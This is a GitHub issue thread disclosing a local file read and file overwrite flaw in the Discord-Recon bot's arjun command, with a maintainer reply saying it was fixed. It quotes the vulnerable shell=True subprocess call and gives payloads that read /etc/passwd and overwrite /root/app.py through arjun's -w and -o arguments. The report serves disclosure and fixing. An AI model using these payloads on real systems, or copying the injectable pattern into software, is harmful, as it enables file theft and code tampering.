### ISSUE TITLE
LFI and File write using arjun arguments

### ISSUE THREAD

**Issue by omarbdrn** [DEMON1A/Discord-Recon#13]
### Vulnerable Code

```
Process = subprocess.Popen(f'python3 arjun.py -u {argument}' , shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
Output = Process.communicate()[0].decode('UTF-8')
Output = removeColors.Remove(Output); chdir(MainPath)
Output = removeString.removeString('Processing' , Output=Output)
```

By using -w argument we can read any file using it as an wordlist for arjun
Payload : .arjun http://myserver/ -w /etc/passwd

Also their is an issue that you can overwrite files using output arguments as -o

.arjun http://myserver/ -o /root/app.py

**Comment by DEMON1A** [comment]
- This issue has been fixed at 8892591
